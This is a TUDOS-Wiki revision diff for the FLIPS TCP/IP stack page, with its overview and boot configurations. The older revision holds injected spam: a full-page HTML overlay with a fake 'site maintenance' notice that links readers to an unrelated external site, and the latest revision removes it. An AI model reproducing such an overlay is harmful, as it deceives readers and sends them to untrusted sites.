DDE::Flips: Difference between revisions

From TUDOS-Wiki
Jump to navigationJump to search
No edit summary
No edit summary
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
----
[[Category:DDE]]
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
''This page describes software that has been developed for L4Env and is no longer supported with L4Re.''
----
=[http://oleqatyqi.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
----
=[http://oleqatyqi.co.cc CLICK HERE]=
----
</div>
== Overview ==
== Overview ==



Latest revision as of 16:59, 30 January 2012

This page describes software that has been developed for L4Env and is no longer supported with L4Re.

Overview

FLIPS, FLexible IP-Stack for TUDOS, provides the standard BSD-socket interface to clients and is thereby a full featured TCP/IP network stack supporting TCP, UDP and NETLINK for configuration. FLIPS is based on unmodified Linux 2.4.34.4 sources and requires ORe as network driver service.

Running Flips

with DHCP

title FLIPS with DHCP
kernel /bin/bootstrap
modaddr 0x02000000
module /bin/fiasco
module /bin/sigma0
module /bin/roottask
module /bin/names
module /bin/dm_phys
module /bin/l4io
module /bin/ore
module /bin/flips-ore --dhcp

without DHCP

title FLIPS without DHCP
kernel /bin/bootstrap
modaddr 0x02000000
module /bin/fiasco
module /bin/sigma0
module /bin/roottask
module /bin/names
module /bin/dm_phys
module /bin/l4io
module /bin/ore
module /bin/name_server
module /bin/mini_ifconfig -n eth0 172.20.0.10 255.255.0.0 172.20.0.1 -n lo 127.0.0.1 255.255.255.255
module /bin/flips-ore